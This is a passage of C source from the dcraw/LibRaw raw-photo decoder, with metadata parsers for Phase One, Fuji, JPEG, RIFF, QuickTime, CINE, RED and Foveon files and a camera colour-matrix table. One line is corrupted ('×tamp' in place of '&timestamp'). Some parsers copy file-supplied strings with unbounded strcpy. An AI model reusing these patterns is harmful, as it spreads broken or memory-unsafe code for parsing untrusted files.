tag = get4();
type = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, base+data, SEEK_SET);
switch (tag) {
#ifdef LIBRAW_LIBRARY_BUILD
case 0x0102:
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if ((imgdata.shootinginfo.BodySerial[0] == 0x4c) && (imgdata.shootinginfo.BodySerial[1] == 0x49)) {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[2] & 0x3f)) - 0x41;
} else {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[1] & 0x3f)) - 0x41;
}
setPhaseOneFeatures(unique_id);
break;
case 0x0401:
if (type == 4) imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
else imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, (getreal(type)/2.0f));
break;
case 0x0403:
if (type == 4) imgdata.lens.makernotes.CurFocal = int_to_float(data);
else imgdata.lens.makernotes.CurFocal = getreal(type);
break;
case 0x0410:
stmread(imgdata.lens.makernotes.body, len, ifp);
break;
case 0x0412:
stmread(imgdata.lens.makernotes.Lens, len, ifp);
break;
case 0x0414:
if (type == 4) {
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
} else {
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, (getreal(type) / 2.0f));
}
break;
case 0x0415:
if (type == 4) {
imgdata.lens.makernotes.MinAp4CurFocal = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
} else {
imgdata.lens.makernotes.MinAp4CurFocal = libraw_powf64(2.0f, (getreal(type) / 2.0f));
}
break;
case 0x0416:
if (type == 4) {
imgdata.lens.makernotes.MinFocal = int_to_float(data);
} else {
imgdata.lens.makernotes.MinFocal = getreal(type);
}
if (imgdata.lens.makernotes.MinFocal > 1000.0f)
{
imgdata.lens.makernotes.MinFocal = 0.0f;
}
break;
case 0x0417:
if (type == 4) {
imgdata.lens.makernotes.MaxFocal = int_to_float(data);
} else {
imgdata.lens.makernotes.MaxFocal = getreal(type);
}
break;
#endif
case 0x100: flip = "0653"[data & 3]-'0'; break;
case 0x106:
for (i=0; i < 9; i++)
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.P1_color[0].romm_cam[i]=
#endif
((float *)romm_cam)[i] = getreal(11);
romm_coeff (romm_cam);
break;
case 0x107:
FORC3 cam_mul[c] = getreal(11);
break;
case 0x108: raw_width = data; break;
case 0x109: raw_height = data; break;
case 0x10a: left_margin = data; break;
case 0x10b: top_margin = data; break;
case 0x10c: width = data; break;
case 0x10d: height = data; break;
case 0x10e: ph1.format = data; break;
case 0x10f: data_offset = data+base; break;
case 0x110: meta_offset = data+base;
meta_length = len; break;
case 0x112: ph1.key_off = save - 4; break;
case 0x210: ph1.tag_210 = int_to_float(data); break;
case 0x21a: ph1.tag_21a = data; break;
case 0x21c: strip_offset = data+base; break;
case 0x21d: ph1.t_black = data; break;
case 0x222: ph1.split_col = data; break;
case 0x223: ph1.black_col = data+base; break;
case 0x224: ph1.split_row = data; break;
case 0x225: ph1.black_row = data+base; break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0x226:
for (i=0; i < 9; i++)
imgdata.color.P1_color[1].romm_cam[i] = getreal(11);
break;
#endif
case 0x301:
model[63] = 0;
fread (model, 1, 63, ifp);
if ((cp = strstr(model," camera"))) *cp = 0;
}
fseek (ifp, save, SEEK_SET);
}
#ifdef LIBRAW_LIBRARY_BUILD
if (!imgdata.lens.makernotes.body[0] && !imgdata.shootinginfo.BodySerial[0]) {
fseek (ifp, meta_offset, SEEK_SET);
order = get2();
fseek (ifp, 6, SEEK_CUR);
fseek (ifp, meta_offset+get4(), SEEK_SET);
entries = get4(); get4();
while (entries--) {
tag = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, meta_offset+data, SEEK_SET);
if (tag == 0x0407) {
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if ((imgdata.shootinginfo.BodySerial[0] == 0x4c) && (imgdata.shootinginfo.BodySerial[1] == 0x49)) {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[2] & 0x3f)) - 0x41;
} else {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[1] & 0x3f)) - 0x41;
}
setPhaseOneFeatures(unique_id);
}
fseek (ifp, save, SEEK_SET);
}
}
#endif
load_raw = ph1.format < 3 ?
&CLASS phase_one_load_raw : &CLASS phase_one_load_raw_c;
maximum = 0xffff;
strcpy (make, "Phase One");
if (model[0]) return;
switch (raw_height) {
case 2060: strcpy (model,"LightPhase"); break;
case 2682: strcpy (model,"H 10"); break;
case 4128: strcpy (model,"H 20"); break;
case 5488: strcpy (model,"H 25"); break;
}
}
void CLASS parse_fuji (int offset)
{
unsigned entries, tag, len, save, c;
fseek (ifp, offset, SEEK_SET);
entries = get4();
if (entries > 255)
return;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_PARSEFUJI_PROCESSED;
#endif
while (entries--)
{
tag = get2();
len = get2();
save = ftell(ifp);
if (tag == 0x100) {
raw_height = get2();
raw_width = get2();
} else if (tag == 0x121) {
height = get2();
if ((width = get2()) == 4284) width += 3;
} else if (tag == 0x130) {
fuji_layout = fgetc(ifp) >> 7;
fuji_width = !(fgetc(ifp) & 8);
} else if (tag == 0x131) {
filters = 9;
FORC(36)
{
int q = fgetc(ifp);
xtrans_abs[0][35 - c] = MAX(0,MIN(q,2)); /* & 3;*/
}
} else if (tag == 0x2ff0) {
FORC4 cam_mul[c ^ 1] = get2();
}
// IB start
#ifdef LIBRAW_LIBRARY_BUILD
else if (tag == 0x9650)
{
short a = (short)get2();
float b =fMAX(1.0f, get2());
imgdata.makernotes.fuji.FujiExpoMidPointShift = a / b;
} else if (tag == 0x2100) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ 1] = get2();
} else if (tag == 0x2200) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ 1] = get2();
} else if (tag == 0x2300) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ 1] = get2();
} else if (tag == 0x2301) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ 1] = get2();
} else if (tag == 0x2302) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][c ^ 1] = get2();
} else if (tag == 0x2310) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ 1] = get2();
} else if (tag == 0x2400) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ 1] = get2();
}
#endif
// IB end
else if (tag == 0xc000) {
c = order;
order = 0x4949;
if ((tag = get4()) > 10000) tag = get4();
if (tag > 10000) tag = get4();
width = tag;
height = get4();
#ifdef LIBRAW_LIBRARY_BUILD
libraw_internal_data.unpacker_data.posRAFData = save;
libraw_internal_data.unpacker_data.lenRAFData = (len>>1);
#endif
order = c;
}
fseek (ifp, save+len, SEEK_SET);
}
height <<= fuji_layout;
width >>= fuji_layout;
}
int CLASS parse_jpeg (int offset)
{
int len, save, hlen, mark;
fseek (ifp, offset, SEEK_SET);
if (fgetc(ifp) != 0xff || fgetc(ifp) != 0xd8) return 0;
while (fgetc(ifp) == 0xff && (mark = fgetc(ifp)) != 0xda) {
order = 0x4d4d;
len = get2() - 2;
save = ftell(ifp);
if (mark == 0xc0 || mark == 0xc3 || mark == 0xc9) {
fgetc(ifp);
raw_height = get2();
raw_width = get2();
}
order = get2();
hlen = get4();
if (get4() == 0x48454150
#ifdef LIBRAW_LIBRARY_BUILD
&& (save+hlen) >= 0 && (save+hlen)<=ifp->size()
#endif
) /* "HEAP" */
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
#endif
parse_ciff (save+hlen, len-hlen, 0);
}
if (parse_tiff (save+6)) apply_tiff();
fseek (ifp, save+len, SEEK_SET);
}
return 1;
}
void CLASS parse_riff()
{
unsigned i, size, end;
char tag[4], date[64], month[64];
static const char mon[12][4] =
{ "Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec" };
struct tm t;
order = 0x4949;
fread (tag, 4, 1, ifp);
size = get4();
end = ftell(ifp) + size;
if (!memcmp(tag,"RIFF",4) || !memcmp(tag,"LIST",4)) {
int maxloop = 1000;
get4();
while (ftell(ifp)+7 < end && !feof(ifp) && maxloop--)
parse_riff();
} else if (!memcmp(tag,"nctg",4)) {
while (ftell(ifp)+7 < end) {
i = get2();
size = get2();
if ((i+1) >> 1 == 10 && size == 20)
get_timestamp(0);
else fseek (ifp, size, SEEK_CUR);
}
} else if (!memcmp(tag,"IDIT",4) && size < 64) {
fread (date, 64, 1, ifp);
date[size] = 0;
memset (&t, 0, sizeof t);
if (sscanf (date, "%*s %s %d %d:%d:%d %d", month, &t.tm_mday,
&t.tm_hour, &t.tm_min, &t.tm_sec, &t.tm_year) == 6) {
for (i=0; i < 12 && strcasecmp(mon[i],month); i++);
t.tm_mon = i;
t.tm_year -= 1900;
if (mktime(&t) > 0)
timestamp = mktime(&t);
}
} else
fseek (ifp, size, SEEK_CUR);
}
void CLASS parse_qt (int end)
{
unsigned save, size;
char tag[4];
order = 0x4d4d;
while (ftell(ifp)+7 < end) {
save = ftell(ifp);
if ((size = get4()) < 8) return;
if ((int)size < 0) return; // 2+GB is too much
if (save + size < save) return; // 32bit overflow
fread (tag, 4, 1, ifp);
if (!memcmp(tag,"moov",4) ||
!memcmp(tag,"udta",4) ||
!memcmp(tag,"CNTH",4))
parse_qt (save+size);
if (!memcmp(tag,"CNDA",4))
parse_jpeg (ftell(ifp));
fseek (ifp, save+size, SEEK_SET);
}
}
void CLASS parse_smal (int offset, int fsize)
{
int ver;
fseek (ifp, offset+2, SEEK_SET);
order = 0x4949;
ver = fgetc(ifp);
if (ver == 6)
fseek (ifp, 5, SEEK_CUR);
if (get4() != fsize) return;
if (ver > 6) data_offset = get4();
raw_height = height = get2();
raw_width = width = get2();
strcpy (make, "SMaL");
sprintf (model, "v%d %dx%d", ver, width, height);
if (ver == 6) load_raw = &CLASS smal_v6_load_raw;
if (ver == 9) load_raw = &CLASS smal_v9_load_raw;
}
void CLASS parse_cine()
{
unsigned off_head, off_setup, off_image, i;
order = 0x4949;
fseek (ifp, 4, SEEK_SET);
is_raw = get2() == 2;
fseek (ifp, 14, SEEK_CUR);
is_raw *= get4();
off_head = get4();
off_setup = get4();
off_image = get4();
timestamp = get4();
if ((i = get4())) timestamp = i;
fseek (ifp, off_head+4, SEEK_SET);
raw_width = get4();
raw_height = get4();
switch (get2(),get2()) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 16: load_raw = &CLASS unpacked_load_raw;
}
fseek (ifp, off_setup+792, SEEK_SET);
strcpy (make, "CINE");
sprintf (model, "%d", get4());
fseek (ifp, 12, SEEK_CUR);
switch ((i=get4()) & 0xffffff) {
case 3: filters = 0x94949494; break;
case 4: filters = 0x49494949; break;
default: is_raw = 0;
}
fseek (ifp, 72, SEEK_CUR);
switch ((get4()+3600) % 360) {
case 270: flip = 4; break;
case 180: flip = 1; break;
case 90: flip = 7; break;
case 0: flip = 2;
}
cam_mul[0] = getreal(11);
cam_mul[2] = getreal(11);
maximum = ~((~0u) << get4());
fseek (ifp, 668, SEEK_CUR);
shutter = get4()/1000000000.0;
fseek (ifp, off_image, SEEK_SET);
if (shot_select < is_raw)
fseek (ifp, shot_select*8, SEEK_CUR);
data_offset = (INT64) get4() + 8;
data_offset += (INT64) get4() << 32;
}
void CLASS parse_redcine()
{
unsigned i, len, rdvo;
order = 0x4d4d;
is_raw = 0;
fseek (ifp, 52, SEEK_SET);
width = get4();
height = get4();
fseek (ifp, 0, SEEK_END);
fseek (ifp, -(i = ftello(ifp) & 511), SEEK_CUR);
if (get4() != i || get4() != 0x52454f42) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Tail is missing, parsing from head...\n"), ifname);
#endif
fseek (ifp, 0, SEEK_SET);
while ((len = get4()) != EOF) {
if (get4() == 0x52454456)
if (is_raw++ == shot_select)
data_offset = ftello(ifp) - 8;
fseek (ifp, len-8, SEEK_CUR);
}
} else {
rdvo = get4();
fseek (ifp, 12, SEEK_CUR);
is_raw = get4();
fseeko (ifp, rdvo+8 + shot_select*4, SEEK_SET);
data_offset = get4();
}
}
//@end COMMON
char * CLASS foveon_gets (int offset, char *str, int len)
{
int i;
fseek (ifp, offset, SEEK_SET);
for (i=0; i < len-1; i++)
if ((str[i] = get2()) == 0) break;
str[i] = 0;
return str;
}
void CLASS parse_foveon()
{
int entries, img=0, off, len, tag, save, i, wide, high, pent, poff[256][2];
char name[64], value[64];
order = 0x4949; /* Little-endian */
fseek (ifp, 36, SEEK_SET);
flip = get4();
fseek (ifp, -4, SEEK_END);
fseek (ifp, get4(), SEEK_SET);
if (get4() != 0x64434553) return; /* SECd */
entries = (get4(),get4());
while (entries--) {
off = get4();
len = get4();
tag = get4();
save = ftell(ifp);
fseek (ifp, off, SEEK_SET);
if (get4() != (0x20434553 | (tag << 24))) return;
switch (tag) {
case 0x47414d49: /* IMAG */
case 0x32414d49: /* IMA2 */
fseek (ifp, 8, SEEK_CUR);
pent = get4();
wide = get4();
high = get4();
if (wide > raw_width && high > raw_height) {
switch (pent) {
case 5: load_flags = 1;
case 6: load_raw = &CLASS foveon_sd_load_raw; break;
case 30: load_raw = &CLASS foveon_dp_load_raw; break;
default: load_raw = 0;
}
raw_width = wide;
raw_height = high;
data_offset = off+28;
is_foveon = 1;
}
fseek (ifp, off+28, SEEK_SET);
if (fgetc(ifp) == 0xff && fgetc(ifp) == 0xd8
&& thumb_length < len-28) {
thumb_offset = off+28;
thumb_length = len-28;
write_thumb = &CLASS jpeg_thumb;
}
if (++img == 2 && !thumb_length) {
thumb_offset = off+24;
thumb_width = wide;
thumb_height = high;
write_thumb = &CLASS foveon_thumb;
}
break;
case 0x464d4143: /* CAMF */
meta_offset = off+8;
meta_length = len-28;
break;
case 0x504f5250: /* PROP */
pent = (get4(),get4());
fseek (ifp, 12, SEEK_CUR);
off += pent*8 + 24;
if ((unsigned) pent > 256) pent=256;
for (i=0; i < pent*2; i++)
((int *)poff)[i] = off + get4()*2;
for (i=0; i < pent; i++) {
foveon_gets (poff[i][0], name, 64);
foveon_gets (poff[i][1], value, 64);
if (!strcmp (name, "ISO"))
iso_speed = atoi(value);
if (!strcmp (name, "CAMMANUF"))
strcpy (make, value);
if (!strcmp (name, "CAMMODEL"))
strcpy (model, value);
if (!strcmp (name, "WB_DESC"))
strcpy (model2, value);
if (!strcmp (name, "TIME"))
timestamp = atoi(value);
if (!strcmp (name, "EXPTIME"))
shutter = atoi(value) / 1000000.0;
if (!strcmp (name, "APERTURE"))
aperture = atof(value);
if (!strcmp (name, "FLENGTH"))
focal_len = atof(value);
#ifdef LIBRAW_LIBRARY_BUILD
if (!strcmp (name, "CAMSERIAL"))
strcpy (imgdata.shootinginfo.BodySerial, value);
if (!strcmp (name, "FLEQ35MM"))
imgdata.lens.makernotes.FocalLengthIn35mmFormat = atof(value);
if (!strcmp (name, "LENSARANGE"))
{
char *sp;
imgdata.lens.makernotes.MaxAp4CurFocal = imgdata.lens.makernotes.MinAp4CurFocal = atof(value);
sp = strrchr (value, ' ');
if (sp)
{
imgdata.lens.makernotes.MinAp4CurFocal = atof(sp);
if (imgdata.lens.makernotes.MaxAp4CurFocal > imgdata.lens.makernotes.MinAp4CurFocal)
my_swap (float, imgdata.lens.makernotes.MaxAp4CurFocal, imgdata.lens.makernotes.MinAp4CurFocal);
}
}
if (!strcmp (name, "LENSFRANGE"))
{
char *sp;
imgdata.lens.makernotes.MinFocal = imgdata.lens.makernotes.MaxFocal = atof(value);
sp = strrchr (value, ' ');
if (sp)
{
imgdata.lens.makernotes.MaxFocal = atof(sp);
if ((imgdata.lens.makernotes.MaxFocal + 0.17f) < imgdata.lens.makernotes.MinFocal)
my_swap (float, imgdata.lens.makernotes.MaxFocal, imgdata.lens.makernotes.MinFocal);
}
}
if (!strcmp (name, "LENSMODEL"))
{
char *sp;
imgdata.lens.makernotes.LensID = strtol (value, &sp, 16); // atoi(value);
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = Sigma_X3F;
}
}
#endif
}
#ifdef LOCALTIME
timestamp = mktime (gmtime (×tamp));
#endif
}
fseek (ifp, save, SEEK_SET);
}
}
//@out COMMON
/*
All matrices are from Adobe DNG Converter unless otherwise noted.
*/
void CLASS adobe_coeff (const char *t_make, const char *t_model
#ifdef LIBRAW_LIBRARY_BUILD
,int internal_only
#endif
)
{
static const struct {
const char *prefix;
int t_black, t_maximum, trans[12];
} table[] = {
{ "AgfaPhoto DC-833m", 0, 0, /* DJC */
{ 11438,-3762,-1115,-2409,9914,2497,-1227,2295,5300 } },
{ "Apple QuickTake", 0, 0, /* DJC */
{ 21392,-5653,-3353,2406,8010,-415,7166,1427,2078 } },
{"Broadcom RPi IMX219", 66, 0x3ff,
{ 5302,1083,-728,-5320,14112,1699,-863,2371,5136 } }, /* LibRaw */
{ "Broadcom RPi OV5647", 16, 0x3ff,
{ 12782,-4059,-379,-478,9066,1413,1340,1513,5176 } }, /* DJC */
{ "Canon EOS D2000", 0, 0,
{ 24542,-10860,-3401,-1490,11370,-297,2858,-605,3225 } },
{ "Canon EOS D6000", 0, 0,
{ 20482,-7172,-3125,-1033,10410,-285,2542,226,3136 } },
{ "Canon EOS D30", 0, 0,
{ 9805,-2689,-1312,-5803,13064,3068,-2438,3075,8775 } },
{ "Canon EOS D60", 0, 0xfa0,
{ 6188,-1341,-890,-7168,14489,2937,-2640,3228,8483 } },
{ "Canon EOS 5DS", 0, 0x3c96,
{ 6250,-711,-808,-5153,12794,2636,-1249,2198,5610 } },
{ "Canon EOS 5D Mark IV", 0, 0,
{ 6446, -366, -864, -4436, 12204, 2513, -952, 2496, 6348 }},
{ "Canon EOS 5D Mark III", 0, 0x3c80,
{ 6722,-635,-963,-4287,12460,2028,-908,2162,5668 } },
{ "Canon EOS 5D Mark II", 0, 0x3cf0,
{ 4716,603,-830,-7798,15474,2480,-1496,1937,6651 } },
{ "Canon EOS 5D", 0, 0xe6c,
{ 6347,-479,-972,-8297,15954,2480,-1968,2131,7649 } },
{ "Canon EOS 6D", 0, 0x3c82,
{ 8621,-2197,-787,-3150,11358,912,-1161,2400,4836 } },
{ "Canon EOS 7D Mark II", 0, 0x3510,
{ 7268,-1082,-969,-4186,11839,2663,-825,2029,5839 } },
{ "Canon EOS 7D", 0, 0x3510,
{ 6844,-996,-856,-3876,11761,2396,-593,1772,6198 } },
{ "Canon EOS 80D", 0, 0,
{ 7457,-671,-937,-4849,12495,2643,-1213,2354,5492 } },
{ "Canon EOS 10D", 0, 0xfa0,
{ 8197,-2000,-1118,-6714,14335,2592,-2536,3178,8266 } },
{ "Canon EOS 20Da", 0, 0,
{ 14155,-5065,-1382,-6550,14633,2039,-1623,1824,6561 } },
{ "Canon EOS 20D", 0, 0xfff,
{ 6599,-537,-891,-8071,15783,2424,-1983,2234,7462 } },
{ "Canon EOS 30D", 0, 0,
{ 6257,-303,-1000,-7880,15621,2396,-1714,1904,7046 } },
{ "Canon EOS 40D", 0, 0x3f60,
{ 6071,-747,-856,-7653,15365,2441,-2025,2553,7315 } },
{ "Canon EOS 50D", 0, 0x3d93,
{ 4920,616,-593,-6493,13964,2784,-1774,3178,7005 } },
{ "Canon EOS 60D", 0, 0x2ff7,
{ 6719,-994,-925,-4408,12426,2211,-887,2129,6051 } },
{ "Canon EOS 70D", 0, 0x3bc7,
{ 7034,-804,-1014,-4420,12564,2058,-851,1994,5758 } },
{ "Canon EOS 100D", 0, 0x350f,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 300D", 0, 0xfa0,
{ 8197,-2000,-1118,-6714,14335,2592,-2536,3178,8266 } },
{ "Canon EOS 350D", 0, 0xfff,
{ 6018,-617,-965,-8645,15881,2975,-1530,1719,7642 } },
{ "Canon EOS 400D", 0, 0xe8e,
{ 7054,-1501,-990,-8156,15544,2812,-1278,1414,7796 } },
{ "Canon EOS 450D", 0, 0x390d,
{ 5784,-262,-821,-7539,15064,2672,-1982,2681,7427 } },
{ "Canon EOS 500D", 0, 0x3479,
{ 4763,712,-646,-6821,14399,2640,-1921,3276,6561 } },
{ "Canon EOS 550D", 0, 0x3dd7,
{ 6941,-1164,-857,-3825,11597,2534,-416,1540,6039 } },
{ "Canon EOS 600D", 0, 0x3510,
{ 6461,-907,-882,-4300,12184,2378,-819,1944,5931 } },
{ "Canon EOS 650D", 0, 0x354d,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 750D", 0, 0x3c00,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS 760D", 0, 0x3c00,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS 700D", 0, 0x3c00,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS 1000D", 0, 0xe43,
{ 6771,-1139,-977,-7818,15123,2928,-1244,1437,7533 } },
{ "Canon EOS 1100D", 0, 0x3510,
{ 6444,-904,-893,-4563,12308,2535,-903,2016,6728 } },
{ "Canon EOS 1200D", 0, 0x37c2,
{ 6461,-907,-882,-4300,12184,2378,-819,1944,5931 } },
{ "Canon EOS 1300D", 0, 0x37c2,
{ 6939, -1016, -866, -4428, 12473, 2177, -1175, 2178, 6162 } },
{ "Canon EOS M3", 0, 0,
{ 6362,-823,-847,-4426,12109,2616,-743,1857,5635 } },
{ "Canon EOS M5", 0, 0, /* Adobe */
{ 8532, -701, -1167, -4095, 11879, 2508, -797, 2424, 7010 }},
{ "Canon EOS M10", 0, 0,
{ 6400,-480,-888,-5294,13416,2047,-1296,2203,6137 } },
{ "Canon EOS M", 0, 0,
{ 6602,-841,-939,-4472,12458,2247,-975,2039,6148 } },
{ "Canon EOS-1Ds Mark III", 0, 0x3bb0,
{ 5859,-211,-930,-8255,16017,2353,-1732,1887,7448 } },
{ "Canon EOS-1Ds Mark II", 0, 0xe80,
{ 6517,-602,-867,-8180,15926,2378,-1618,1771,7633 } },
{ "Canon EOS-1D Mark IV", 0, 0x3bb0,
{ 6014,-220,-795,-4109,12014,2361,-561,1824,5787 } },
{ "Canon EOS-1D Mark III", 0, 0x3bb0,
{ 6291,-540,-976,-8350,16145,2311,-1714,1858,7326 } },
{ "Canon EOS-1D Mark II N", 0, 0xe80,
{ 6240,-466,-822,-8180,15825,2500,-1801,1938,8042 } },
{ "Canon EOS-1D Mark II", 0, 0xe80,
{ 6264,-582,-724,-8312,15948,2504,-1744,1919,8664 } },
{ "Canon EOS-1DS", 0, 0xe20,
{ 4374,3631,-1743,-7520,15212,2472,-2892,3632,8161 } },
{ "Canon EOS-1D C", 0, 0x3c4e,
{ 6847,-614,-1014,-4669,12737,2139,-1197,2488,6846 } },
{ "Canon EOS-1D X Mark II", 0, 0x3c4e,
{ 7596,-978,967,-4808,12571,2503,-1398,2567,5752 } },
{ "Canon EOS-1D X", 0, 0x3c4e,
{ 6847,-614,-1014,-4669,12737,2139,-1197,2488,6846 } },
{ "Canon EOS-1D", 0, 0xe20,
{ 6806,-179,-1020,-8097,16415,1687,-3267,4236,7690 } },
{ "Canon EOS C500", 853, 0, /* DJC */
{ 17851,-10604,922,-7425,16662,763,-3660,3636,22278 } },
{ "Canon PowerShot A530", 0, 0,
{ 0 } }, /* don't want the A5 matrix */
{ "Canon PowerShot A50", 0, 0,
{ -5300,9846,1776,3436,684,3939,-5540,9879,6200,-1404,11175,217 } },
{ "Canon PowerShot A5", 0, 0,
{ -4801,9475,1952,2926,1611,4094,-5259,10164,5947,-1554,10883,547 } },
{ "Canon PowerShot G10", 0, 0,
{ 11093,-3906,-1028,-5047,12492,2879,-1003,1750,5561 } },
{ "Canon PowerShot G11", 0, 0,
{ 12177,-4817,-1069,-1612,9864,2049,-98,850,4471 } },
{ "Canon PowerShot G12", 0, 0,
{ 13244,-5501,-1248,-1508,9858,1935,-270,1083,4366 } },
{ "Canon PowerShot G15", 0, 0,
{ 7474,-2301,-567,-4056,11456,2975,-222,716,4181 } },
{ "Canon PowerShot G16", 0, 0,
{ 14130,-8071,127,2199,6528,1551,3402,-1721,4960 } },
{ "Canon PowerShot G1 X Mark II", 0, 0,
{ 7378,-1255,-1043,-4088,12251,2048,-876,1946,5805 } },
{ "Canon PowerShot G1 X", 0, 0,
{ 7378,-1255,-1043,-4088,12251,2048,-876,1946,5805 } },
{ "Canon PowerShot G1", 0, 0,
{ -4778,9467,2172,4743,-1141,4344,-5146,9908,6077,-1566,11051,557 } },
{ "Canon PowerShot G2", 0, 0,
{ 9087,-2693,-1049,-6715,14382,2537,-2291,2819,7790 } },
{ "Canon PowerShot G3 X", 0, 0,
{ 9701,-3857,-921,-3149,11537,1817,-786,1817,5147 } },
{ "Canon PowerShot G3", 0, 0,
{ 9212,-2781,-1073,-6573,14189,2605,-2300,2844,7664 } },
{ "Canon PowerShot G5 X",0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G5", 0, 0,
{ 9757,-2872,-933,-5972,13861,2301,-1622,2328,7212 } },
{ "Canon PowerShot G6", 0, 0,
{ 9877,-3775,-871,-7613,14807,3072,-1448,1305,7485 } },
{ "Canon PowerShot G7 X Mark II", 0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G7 X", 0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G9 X",0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G9", 0, 0,
{ 7368,-2141,-598,-5621,13254,2625,-1418,1696,5743 } },
{ "Canon PowerShot Pro1", 0, 0,
{ 10062,-3522,-999,-7643,15117,2730,-765,817,7323 } },
{ "Canon PowerShot Pro70", 34, 0,
{ -4155,9818,1529,3939,-25,4522,-5521,9870,6610,-2238,10873,1342 } },
{ "Canon PowerShot Pro90", 0, 0,
{ -4963,9896,2235,4642,-987,4294,-5162,10011,5859,-1770,11230,577 } },
{ "Canon PowerShot S30", 0, 0,
{ 10566,-3652,-1129,-6552,14662,2006,-2197,2581,7670 } },
{ "Canon PowerShot S40", 0, 0,
{ 8510,-2487,-940,-6869,14231,2900,-2318,2829,9013 } },
{ "Canon PowerShot S45", 0, 0,
{ 8163,-2333,-955,-6682,14174,2751,-2077,2597,8041 } },
{ "Canon PowerShot S50", 0, 0,
{ 8882,-2571,-863,-6348,14234,2288,-1516,2172,6569 } },
{ "Canon PowerShot S60", 0, 0,
{ 8795,-2482,-797,-7804,15403,2573,-1422,1996,7082 } },
{ "Canon PowerShot S70", 0, 0,
{ 9976,-3810,-832,-7115,14463,2906,-901,989,7889 } },
{ "Canon PowerShot S90", 0, 0,
{ 12374,-5016,-1049,-1677,9902,2078,-83,852,4683 } },
{ "Canon PowerShot S95", 0, 0,
{ 13440,-5896,-1279,-1236,9598,1931,-180,1001,4651 } },
{ "Canon PowerShot S120", 0, 0,
{ 6961,-1685,-695,-4625,12945,1836,-1114,2152,5518 } },
{ "Canon PowerShot S110", 0, 0,
{ 8039,-2643,-654,-3783,11230,2930,-206,690,4194 } },
{ "Canon PowerShot S100", 0, 0,
{ 7968,-2565,-636,-2873,10697,2513,180,667,4211 } },
{ "Canon PowerShot SX1 IS", 0, 0,
{ 6578,-259,-502,-5974,13030,3309,-308,1058,4970 } },
{ "Canon PowerShot SX50 HS", 0, 0,
{ 12432,-4753,-1247,-2110,10691,1629,-412,1623,4926 } },
{ "Canon PowerShot SX60 HS", 0, 0,
{ 13161,-5451,-1344,-1989,10654,1531,-47,1271,4955 } },
{ "Canon PowerShot A3300", 0, 0, /* DJC */
{ 10826,-3654,-1023,-3215,11310,1906,0,999,4960 } },
{ "Canon PowerShot A470", 0, 0, /* DJC */
{ 12513,-4407,-1242,-2680,10276,2405,-878,2215,4734 } },
{ "Canon PowerShot A610", 0, 0, /* DJC */
{ 15591,-6402,-1592,-5365,13198,2168,-1300,1824,5075 } },
{ "Canon PowerShot A620", 0, 0, /* DJC */
{ 15265,-6193,-1558,-4125,12116,2010,-888,1639,5220 } },
{ "Canon PowerShot A630", 0, 0, /* DJC */
{ 14201,-5308,-1757,-6087,14472,1617,-2191,3105,5348 } },
{ "Canon PowerShot A640", 0, 0, /* DJC */
{ 13124,-5329,-1390,-3602,11658,1944,-1612,2863,4885 } },
{ "Canon PowerShot A650", 0, 0, /* DJC */
{ 9427,-3036,-959,-2581,10671,1911,-1039,1982,4430 } },
{ "Canon PowerShot A720", 0, 0, /* DJC */
{ 14573,-5482,-1546,-1266,9799,1468,-1040,1912,3810 } },
{ "Canon PowerShot S3 IS", 0, 0, /* DJC */
{ 14062,-5199,-1446,-4712,12470,2243,-1286,2028,4836 } },
{ "Canon PowerShot SX110 IS", 0, 0, /* DJC */
{ 14134,-5576,-1527,-1991,10719,1273,-1158,1929,3581 } },
{ "Canon PowerShot SX220", 0, 0, /* DJC */
{ 13898,-5076,-1447,-1405,10109,1297,-244,1860,3687 } },
